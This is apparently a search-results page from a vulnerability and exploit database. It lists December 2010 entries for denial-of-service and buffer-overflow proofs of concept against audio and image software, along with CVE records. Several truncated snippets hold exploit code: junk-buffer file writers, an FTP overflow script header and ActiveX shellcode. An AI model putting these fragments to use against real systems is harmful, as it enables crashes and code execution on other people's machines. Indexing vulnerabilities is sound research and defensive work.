Lucene search
+L

16608 matches found

zdt
zdt
added 2010/12/05 12:00 a.m.23 views

WaveMax Sound Editor 4.5.1 Denial of Service PoC

Exploit for windows platform in category dos / poc ================================================ WaveMax Sound Editor 4.5.1 Denial of Service PoC ================================================ Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link:...

7AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/05 12:00 a.m.20 views

Freefloat FTP Server Buffer Overflow

Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date: 12/05/2010 Author: 0v3r Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import socket import sys def usage: print "usage : ./freefloatftp.py " pri...

0.5AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/04 12:00 a.m.17 views

WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)

WaveMax Sound Editor 4.5.1 - Denial of Service PoC Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= "1.cda"; my $junk = "\x41" x 1000; open$FILE,"$file";...

0.2AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/04 12:00 a.m.9 views

Free Audio Converter 7.1.5 - Denial of Service (PoC)

Free Audio Converter 7.1.5 - Denial of Service PoC Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC Software Link: http://www.free-audio-converter.net/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] Note: all vendor's products are affected. my $file= "1.mp3";...

0.2AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/04 12:00 a.m.29 views

WaveMax Sound Editor 4.5.1 Denial Of Service

Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= "1.cda"; my $junk = "\x41" x 1000; open$FILE,"$file"; print $FILE $junk; close$FILE; print "File Created...

0.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/12/04 12:00 a.m.25 views

Free Audio Converter 7.1.5 - Denial of Service (PoC)

Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC Software Link: http://www.free-audio-converter.net/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] Note: all vendor's products are affected. my $file= "1.mp3"; my $junk = "\x41" x 1000; open$FILE,"$file"; print...

5.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/12/04 12:00 a.m.28 views

MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)

Exploit Title: Mediamonkey 3.2.4.1304 mp3 Buffer Overflow Vulnerability PoC Date: 12/04/2010 Author: 0v3r Software Link: http://www.mediamonkey.com/download/?dir=download Version: 3.2.4.1304 Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python buff = "\x41" 5000 try: f = open"exploit.mp3",'w'...

5.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/12/04 12:00 a.m.37 views

WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)

Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= "1.cda"; my $junk = "\x41" x 1000; open$FILE,"$file"; print $FILE $junk; close$FILE; print "File Created...

5.3AI score
SaveExploits0
zdt
zdt
added 2010/12/04 12:00 a.m.19 views

Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow

Exploit for windows platform in category remote exploits =================================================================== Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles Buffer Overflow =================================================================== //payload is windows/exec cmd=calc.exe...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/04 12:00 a.m.16 views

TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)

TFTPUtil GUI 1.4.5 - Denial of Service Metasploit Title: TFTPUtil GUI v1.4.5 Invalid Request DoS CVE-ID: OSVDB-ID: Author: Vuk Ivanovic Published: 2010-12-04 Verified: yes This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see th...

0.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/04 12:00 a.m.18 views

Mediamonkey 3.2.4.1304 Buffer Overflow

Exploit Title: Mediamonkey 3.2.4.1304 mp3 Buffer Overflow Vulnerability PoC Date: 12/04/2010 Author: 0v3r Software Link: http://www.mediamonkey.com/download/?dir=download Version: 3.2.4.1304 Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python buff = "\x41" 5000 try: f = open"exploit.mp3",'w'...

1.2AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/04 12:00 a.m.16 views

MediaMonkey 3.2.4.1304 - .mp3 Buffer Overflow (PoC)

MediaMonkey 3.2.4.1304 - .mp3 Buffer Overflow PoC Exploit Title: Mediamonkey 3.2.4.1304 mp3 Buffer Overflow Vulnerability PoC Date: 12/04/2010 Author: 0v3r Software Link: http://www.mediamonkey.com/download/?dir=download Version: 3.2.4.1304 Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python...

1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/04 12:00 a.m.21 views

Free Audio Converter 7.1.5 Denial Of Service

Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC Software Link: http://www.free-audio-converter.net/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] Note: all vendor's products are affected. my $file= "1.mp3"; my $junk = "\x41" x 1000; open$FILE,"$file"; print...

SaveExploits0
Cvelist
Cvelist
added 2010/12/03 8:00 p.m.42 views

CVE-2010-4398

Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control...

6.7AI score0.08661EPSS
SaveExploits3References13
zdt
zdt
added 2010/12/03 12:00 a.m.20 views

FreeTrim MP3 2.2.3 Denial of Service Vulnerability

Exploit for windows platform in category dos / poc ================================================== FreeTrim MP3 2.2.3 Denial of Service Vulnerability ================================================== Exploit Title: FreeTrim MP3 Local Crash PoC Software Link:...

7AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/03 12:00 a.m.33 views

Image Viewer CP Gold 6 Buffer Overflow

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...

1.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/12/03 12:00 a.m.34 views

Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...

9.3CVSS5.2AI score0.31968EPSS
SaveExploits4
zdt
zdt
added 2010/12/03 12:00 a.m.27 views

Image Viewer CP Gold v5.5 Image2PDF() Buffer Overflow (msf)

Exploit for windows platform in category remote exploits =========================================================== Image Viewer CP Gold v5.5 Image2PDF Buffer Overflow msf =========================================================== Image Viewer CP gold v5.5 Buffer Overflow Found by: bz1p AT...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/03 12:00 a.m.21 views

Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Remote Buffer Overflow

Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles Remote Buffer Overflow //payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+...

1.3AI score
SaveExploits0
Positive Technologies
Positive Technologies
added 2010/12/03 12:00 a.m.9 views

PT-2010-5474 · Microsoft · Windows Xp +5

Name of the Vulnerable Software and Affected Versions: Microsoft Windows versions prior to Windows XP SP4, Windows Server 2003 SP3, Windows Vista SP3, Windows Server 2008 SP3, and Windows 7 SP1 Description: An elevation of privilege issue exists due to the improper interaction of drivers with the...

7.8CVSS7.9AI score0.08661EPSS
SaveExploits3References21
Rows per page
Query Builder